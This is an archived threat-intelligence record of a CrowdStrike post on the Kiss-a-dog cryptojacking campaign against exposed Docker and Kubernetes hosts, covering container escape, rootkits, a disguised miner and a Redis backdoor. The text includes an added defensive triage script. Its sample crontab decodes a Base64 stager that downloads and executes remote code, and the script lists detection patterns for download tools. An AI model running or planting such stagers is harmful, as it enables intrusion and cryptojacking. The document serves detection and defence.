{
	"id": "587b3309-f07f-48b7-a494-248da681d37a",
	"created_at": "2026-04-06T00:09:08.997257Z",
	"updated_at": "2026-04-10T03:33:16.372972Z",
	"deleted_at": null,
	"sha1_hash": "b8de0e4d474e76c982a415968858fca44f1e540b",
	"title": "New Kiss-a-dog Cryptojacking Campaign Targets Docker and Kubernetes",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5281668,
	"plain_text": "New Kiss-a-dog Cryptojacking Campaign Targets Docker and\r\nKubernetes\r\nBy Manoj Ahuje\r\nArchived: 2026-04-05 16:31:48 UTC\r\nCrowdStrike has uncovered a new cryptojacking campaign targeting vulnerable Docker and Kubernetes\r\ninfrastructure. The campaign uses an obscured domain in its payload, attempts a container escape and mines\r\nthrough anonymized “dog” mining pools.\r\nCalled “Kiss-a-dog,” the campaign used multiple command-and-control (C2) servers to launch attacks that\r\nattempted to mine cryptocurrency, used user-mode and kernel-mode rootkits to hide the activity, backdoored\r\ncompromised containers, moved laterally in the network and gained persistence.\r\nThe CrowdStrike Falcon® platform helps protect organizations of all sizes from sophisticated breaches,\r\nincluding cryptojacking campaigns such as this.\r\nCrowdStrike has identified a new cryptojacking campaign targeting vulnerable Docker and Kubernetes\r\ninfrastructure. Called “Kiss-a-dog,” the campaign targets Docker and Kubernetes infrastructure using an obscured\r\ndomain in the payload, a container escape attempt and anonymized “dog” mining pools.\r\nCrowdStrike’s Cloud Threat Research team deploys and analyzes honeypots to understand how attackers target\r\nvulnerabilities and put cloud infrastructure at risk. CrowdStrike has previously uncovered campaigns targeting\r\nvulnerable cloud infrastructure by cryptojacking botnets/groups like LemonDuck and Watchdog. Kiss-a-dog relies\r\non tools and techniques previously associated with cryptojacking groups like TeamTNT, which targeted vulnerable\r\nDocker and Kubernetes infrastructure. The CrowdStrike Falcon platform protects customers and comprehensively\r\nsecures cloud environments against cryptojacking campaigns like Kiss-a-dog by delivering a powerful\r\ncombination of agentless capabilities to protect against misconfigurations and control plane attacks and agent-based capabilities to protect cloud workloads with runtime security. 
The CrowdStrike Falcon platform sets the\r\nnew standard in cloud security. Watch this demo to see the Falcon platform in action.\r\nCrowdStrike Detection and Protection\r\nThe Falcon platform unifies cloud security in a single platform to deliver comprehensive protection to its\r\ncustomers from any attacks on Docker and Kubernetes infrastructure. With the Falcon platform, customers can\r\nimplement “shift-left” strategies to identify vulnerabilities and misconfigurations at the development stage to secure\r\nKubernetes and Docker deployments out of the box, while also monitoring production environments for any\r\nsuspicious activity to stop campaigns like Kiss-a-dog.\r\nhttps://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/\r\nPage 1 of 12\n\nThe suspicious activity of the Kiss-a-dog campaign is\r\ndetected by CrowdStrike’s machine learning and by multiple behavior-based indicators of attack (IOAs) along\r\nthe kill chain of the campaign. The Falcon platform takes a defense-in-depth approach to protecting customers by\r\nleveraging incoming telemetry to power detection and provide real-time mitigation. The following IOAs are\r\nused to detect a campaign like Kiss-a-dog:\r\n1. Host path mount to escape the container\r\n2. Rogue container running on your Docker instance\r\n3. Misconfigured Kubernetes or Docker instance\r\nFigures 1.A and 1.B show a High Confidence detection of a malicious service that runs a disguised xmrig.\r\nFigures 1.A and 1.B. Disguised miner process identified and killed by the Falcon platform\r\nMoreover, the Falcon platform analyzes suspicious images and detects runtime malicious activity and network\r\nconnections, along with vulnerability analysis of the image, to provide in-depth reports, as shown in Figure 2.\r\nFigure 2. 
Falcon Dynamic Container Analysis report\r\nSee for yourself how the industry-leading CrowdStrike Falcon platform protects your cloud environments.\r\nStart your 15-day free trial today.\r\nIn mid-2022, a crypto crash caused havoc in the digital currency market,\r\nwhere several currencies — including Bitcoin — dropped 40% to 90% and some of them perished. During this\r\nperiod, cryptomining activity targeting containerized environments remained muffled, until\r\nnow. In September 2022, one of CrowdStrike’s honeypots spotted a number of campaigns enumerating vulnerable\r\ncontainer attack surfaces like Docker and Kubernetes. As CrowdStrike monitors exposed Docker APIs, the\r\nfollowing compromised Docker container triggered additional investigation. Figure 3 shows the entry point used\r\nto trigger the initial payload. The Base64-encoded payload is a Python command that downloads a malicious\r\npayload t.sh from the domain kiss\u003c.\u003ea-dog\u003c.\u003etop — hence the Kiss-a-dog campaign name. The entry point\r\nchecks for and installs cURL using a package manager and adds the malicious payload as a cron job. Let’s take a closer\r\nlook at this payload and the subsequent campaign.\r\nFigure 3. Kiss-a-dog entry point\r\nUse of Obscured Domain\r\nThe entry point payload used in the initial Docker compromise is Python code under the wrapper, as shown in\r\nFigure 4 after Base64 decoding. The URL used in the payload is obscured with backslashes to defeat automated\r\ndecoding and the regex matching that would otherwise retrieve the malicious domain. The Python urllib2 library sanitizes the\r\nbackslashes as part of its validation to form the valid domain name kiss\u003c.\u003ea-dog\u003c.\u003etop before querying a DNS\r\n(Domain Name System) server. 
Attackers used this to their advantage — Figure 5 shows a successful DNS query\r\nafter the actual domain name is parsed. With successful name resolution, attackers download the first payload t.sh\r\nfrom a C2 server, which is saved and executed as .1.\r\nFigure 4. Decoded Kiss-a-dog entry point\r\nFigure 5. Successful DNS query\r\nContainer Escape\r\nContainer escape is the essential step for using the resources of the host and moving laterally into the\r\ncompromised network. The Kiss-a-dog campaign uses a host mount to escape from the container. Because an exposed Docker API lets\r\nthe caller choose a new container’s bind mounts, mounting the host root filesystem into a container started through it gives\r\nthe attacker read-write access to the host filesystem, including its cron directories, with no further exploit. The technique\r\nitself is not new and seems to be common among cryptominers as an attempt to break out of containers. This is\r\nattributable to a lack of innovation by attackers and at the same time speaks to the vast and easy Docker attack\r\nsurface exposed and available on the internet. Per Shodan, there are 10,000+ Docker instances exposed to the\r\ninternet, as shown in Figure 6.\r\nFigure 6.A Docker instances exposed to internet (per Shodan)\r\nFigure 6.B Kubernetes instances exposed to internet (per Shodan)\r\nRemoval of Cloud Monitoring Service\r\nAgent-based cloud monitoring services still remain an easy target for cryptominers, as they can be removed from\r\ncloud instances. After a container escape with root privileges, it is an easy step for an attacker to determine whether an\r\ninstance has a cloud monitoring service installed, and if so, the attackers move on to stopping and uninstalling\r\nthe cloud monitoring service. The Kiss-a-dog campaign reused the following code to remove the service (shown\r\nin Figure 7). 
The code is traced to multiple public GitHub repositories.\r\nFigure 7. Uninstall aegis service\r\nKernel Headers and GCC\r\nDownloading pre-compiled binary tools can cause compatibility issues with the compromised container’s\r\narchitecture and Linux flavor. To avoid that, the Kiss-a-dog campaign prefers to compile, on the compromised\r\ncontainer, the code for the multiple tools required in the next stages of the campaign. The attacker installed the relevant kernel\r\nheaders and GCC to build binaries specific to the container’s Linux architecture and flavor for use on that same container.\r\nUse of Traditional Kernel Rootkits Diamorphine and Libprocesshider\r\nThe Kiss-a-dog campaign uses the Diamorphine and libprocesshider rootkits to hide the miner process from user\r\nspace, where the typical cloud practitioner will look for malicious activity. Both rootkits are known to hide\r\nprocesses from the user: Diamorphine is a loadable kernel module, while libprocesshider is a user-mode shared library that\r\nhooks libc’s directory-listing functions so the hidden process never shows up when /proc is read. To avoid detection on the network, the Kiss-a-dog campaign chose to encode the C/C++\r\nsource files and embed them as a Base64 string in the script, as shown in Figure 8. At runtime, attackers decoded the\r\nBase64 string into a .tar file, which contains the code for the Diamorphine rootkit. It is then compiled using GCC to\r\ncreate the file diamorphin.ko , which is loaded as a kernel module using the insmod command.\r\nFigure 8. Diamorphine rootkit compiled and loaded into the kernel\r\nAttackers used a similar technique to compile the libprocesshider rootkit as a shared library. The difference is that\r\nthe shared library path is set as LD_PRELOAD. 
This allows the attackers to inject the malicious shared library into\r\nevery process spawned on the compromised container.\r\nUse of Dog Pools and Disguised Xmrig\r\nThe motive behind the Kiss-a-dog campaign is to run a cryptominer to mine a digital currency. Attackers are using\r\nXMRig, popular mining software, to mine the cryptocurrency. Cryptojacking groups don’t like to advertise their\r\nwallet addresses because in the past, researchers have found their earnings per day and per campaign by tracking\r\nwallet transactions. Instead, attackers hide wallet addresses by running their own pool servers, where mining\r\npeers — like your compromised container — contribute compute effort without the wallet address ever appearing in\r\nthe miner configuration. Interestingly, attackers\r\nused love\u003c.\u003ea-dog\u003c.\u003etop and touch\u003c.\u003ea-dog\u003c.\u003etop as pool servers to hide the Kiss-a-dog campaign’s wallet\r\naddresses. Figure 9.A shows the pool used in the configuration of XMRig. The campaign also disguises XMRig as\r\nand installs a service to run the binary as cmake.service , as shown in Figure 9.B.\r\nFigure 9.A. Pool configuration for the Kiss-a-dog campaign\r\nFigure 9.B Disguised XMRig as\r\nUse of Pnscan, Zgrab and Masscan\r\nApart from cryptojacking, the secondary goal of the campaign is to reach as many vulnerable instances of\r\nRedis and Docker as possible. To achieve this, attackers download and compile network-scanning tools like\r\npnscan, masscan and zgrab on the compromised container. These tools then scan random IP ranges on the\r\ninternet to look for vulnerable Docker and Redis servers. Figure 10 shows all of the tools in action.\r\nFigure 10. 
Masscan, zgrab and pnscan in action\r\nRedis as a Backdoor\r\nThe Kiss-a-dog campaign installs a Redis server in the background, listening on port 6379 for any incoming\r\nconnection. The Redis server is used mainly to backdoor the container: cron jobs are set to run additional\r\nscripts for mining and pivoting, as shown in Figure 11.\r\nFigure 11. Redis server installed on a container\r\nMultiple Campaigns\r\nThe CrowdStrike Cloud Threat Research team detected multiple campaigns targeting Docker from the same C2\r\nservers previously used by TeamTNT. Table 1 shows some of the malicious payloads used in different campaigns\r\nstarted by TeamTNT. According to our research, the tactics, techniques and procedures of the attacks are very\r\nsimilar across all of the campaigns.\r\nTable 1. Campaign payloads by TeamTNT\r\nConclusion\r\nCryptojacking groups are opportunistically targeting vulnerable Docker and Kubernetes environments to mine\r\ncryptocurrency. The campaigns by cryptojacking groups last from days to months depending on the success rate.\r\nAs cryptocurrency prices dropped, these campaigns went quiet for a couple of months, until\r\nmultiple campaigns were launched in October to take advantage of a less competitive environment. Cloud security\r\npractitioners need to be aware of such campaigns and make sure that their cloud infrastructure doesn’t fall prey.\r\nSecuring containers doesn’t need to be an overly complex task. The Falcon platform provides a unified approach\r\nto cloud security, delivering a powerful combination of agentless capabilities to identify security issues in your\r\nenvironment in real time and agent-based capabilities to protect workloads and secure your cloud environments\r\nwith runtime security. 
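The artifacts described above (a host path bind-mounted into a container, a Base64 Python stager in cron, a library injected into every process through the dynamic loader, a Redis listener on 6379 and a miner hidden behind a systemd unit) can be checked for on a host without any vendor tooling. The Python triage script below is an added example and is not code from the original post or from CrowdStrike. Its inputs are constructed samples in the shape of docker inspect, crontab, /etc/ld.so.preload and ss -ltnp output; the lists of sensitive host paths, backdoor ports and suspect directories are assumptions chosen for illustration, not a published indicator list. The preload check reads /etc/ld.so.preload, the file libprocesshider is commonly installed through, whereas the post describes the path being set as LD_PRELOAD; on a live host both should be inspected.

```python
import base64
import re

# Added example, not code from the original post. Paths, ports and
# directories below are assumptions chosen for illustration.
SENSITIVE_HOST_PATHS = {'/', '/etc', '/root', '/proc', '/sys', '/var/run/docker.sock'}
BACKDOOR_PORTS = {6379}
SUSPECT_EXEC_DIRS = ('/tmp/', '/dev/shm/', '/var/tmp/')
B64_TOKEN = re.compile(r'[A-Za-z0-9+/]{16,}={0,2}')


def container_findings(records):
    '''Flag containers that can reach the host: privileged, or a bind mount
    whose source is a sensitive host path (the escape the campaign uses).'''
    out = []
    for rec in records:
        name, hc = rec['Name'], rec['HostConfig']
        if hc.get('Privileged'):
            out.append('%s: privileged container' % name)
        for bind in hc.get('Binds') or []:
            src = bind.split(':', 1)[0]
            if src in SENSITIVE_HOST_PATHS:
                out.append('%s: host path %s mounted into container' % (name, src))
    return out


def stager_findings(text, where):
    '''Decode base64 tokens in text and flag download-and-execute stagers.'''
    out = []
    for token in B64_TOKEN.findall(text):
        try:
            blob = base64.b64decode(token, validate=True).decode('utf-8', 'ignore')
        except ValueError:  # not base64 after all (plain paths also match the regex)
            continue
        if re.search(r'urllib|urlopen|curl|wget', blob):
            out.append('%s: base64 stager decodes to %r' % (where, blob[:60]))
    return out


def preload_findings(ld_so_preload_text):
    '''Every entry in /etc/ld.so.preload is injected into all new processes.'''
    return ['ld.so.preload injects %s' % line.strip()
            for line in ld_so_preload_text.splitlines() if line.strip()]


def listener_findings(ss_text):
    '''Parse ss -ltnp style output and flag listeners on backdoor ports.'''
    out = []
    for line in ss_text.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] != 'LISTEN':
            continue
        port = int(fields[3].rsplit(':', 1)[1])
        if port in BACKDOOR_PORTS:
            out.append('listener on %d: %s' % (port, fields[-1]))
    return out


def unit_findings(units):
    '''units maps a systemd unit to its ExecStart binary; flag scratch or hidden paths.'''
    out = []
    for unit, exe in units.items():
        hidden = any(part.startswith('.') for part in exe.split('/') if part)
        if exe.startswith(SUSPECT_EXEC_DIRS) or hidden:
            out.append('%s runs %s from a temporary or hidden path' % (unit, exe))
    return out


# Constructed samples: one clean and one suspicious entry per source.
STAGER = base64.b64encode(b'import urllib2;exec(urllib2.urlopen(URL).read())').decode('ascii')
SAMPLE_INSPECT = [
    {'Name': '/nostalgic_hopper',
     'HostConfig': {'Binds': ['/:/mnt:rw'], 'Privileged': False}},
    {'Name': '/web',
     'HostConfig': {'Binds': ['/srv/www:/usr/share/nginx/html:ro'], 'Privileged': False}},
]
SAMPLE_CRONTAB = '''0 3 * * * /usr/local/bin/backup.sh
* * * * * echo %s | base64 -d | python''' % STAGER
SAMPLE_LD_SO_PRELOAD = '/usr/local/lib/libprocesshider.so'
SAMPLE_SS = '''State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:((sshd,pid=812,fd=3))
LISTEN 0      511    0.0.0.0:6379        0.0.0.0:*         users:((redis-server,pid=4021,fd=6))'''
SAMPLE_UNITS = {'sshd.service': '/usr/sbin/sshd', 'cmake.service': '/tmp/.1/cmake'}


def triage():
    '''Run every check over the constructed samples and return the findings.'''
    findings = container_findings(SAMPLE_INSPECT)
    findings += stager_findings(SAMPLE_CRONTAB, 'crontab')
    findings += preload_findings(SAMPLE_LD_SO_PRELOAD)
    findings += listener_findings(SAMPLE_SS)
    findings += unit_findings(SAMPLE_UNITS)
    return findings


if __name__ == '__main__':
    for finding in triage():
        print('[!]', finding)
```

To run it against a live host, feed the same functions the parsed output of docker inspect over the running containers, the root crontab, /etc/ld.so.preload and ss -ltnp; each returns a list of finding strings that is empty on a clean host. Diamorphine hides its own module from lsmod once loaded, so the preload entry, the cron stager and the 6379 listener are the more dependable host-side artifacts of this campaign.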
CrowdStrike strives to enable organizations to stay ahead of the curve and remain fully\r\nprotected from adversaries and breaches.\r\nAdditional Resources\r\nLearn how you can stop cloud breaches with CrowdStrike unified cloud security for multi-cloud and hybrid\r\nenvironments — all in one lightweight platform.\r\nBuild, run and secure cloud-native applications with speed and confidence using Falcon Cloud Security.\r\nTo learn more about the cloud threat landscape, download “Protectors of the Cloud: Combating the Rise\r\nin Threats to Cloud Environments.”\r\nVisit the Falcon Cloud Security CWP capabilities page to see if a managed detection and response solution\r\nfor cloud workloads is right for your organization.\r\nLearn how the powerful CrowdStrike Falcon® platform provides comprehensive protection across your\r\norganization, workers and data, wherever they are located.\r\nGet a full-featured free trial of CrowdStrike Falcon Prevent™ and see for yourself how true next-gen AV\r\nperforms against today’s most sophisticated threats.\r\nSource: https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/"
	],
	"report_names": [
		"new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f809bfcb-b200-4988-80a8-be78ef6a52ef",
			"created_at": "2023-01-06T13:46:39.186988Z",
			"updated_at": "2026-04-10T02:00:03.240002Z",
			"deleted_at": null,
			"main_name": "TeamTNT",
			"aliases": [
				"Adept Libra"
			],
			"source_name": "MISPGALAXY:TeamTNT",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c3ca592f-0669-49bd-ab5c-310007ab2fb4",
			"created_at": "2022-10-25T15:50:23.334495Z",
			"updated_at": "2026-04-10T02:00:05.264841Z",
			"deleted_at": null,
			"main_name": "TeamTNT",
			"aliases": [
				"TeamTNT"
			],
			"source_name": "MITRE:TeamTNT",
			"tools": [
				"Peirates",
				"MimiPenguin",
				"LaZagne",
				"Hildegard"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f012ad04-efca-4598-96a4-61487e1a4f9c",
			"created_at": "2023-11-08T02:00:07.160467Z",
			"updated_at": "2026-04-10T02:00:03.430352Z",
			"deleted_at": null,
			"main_name": "Kiss-a-Dog",
			"aliases": [],
			"source_name": "MISPGALAXY:Kiss-a-Dog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434148,
	"ts_updated_at": 1775791996,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b8de0e4d474e76c982a415968858fca44f1e540b.pdf",
		"text": "https://archive.orkl.eu/b8de0e4d474e76c982a415968858fca44f1e540b.txt",
		"img": "https://archive.orkl.eu/b8de0e4d474e76c982a415968858fca44f1e540b.jpg"
	}
}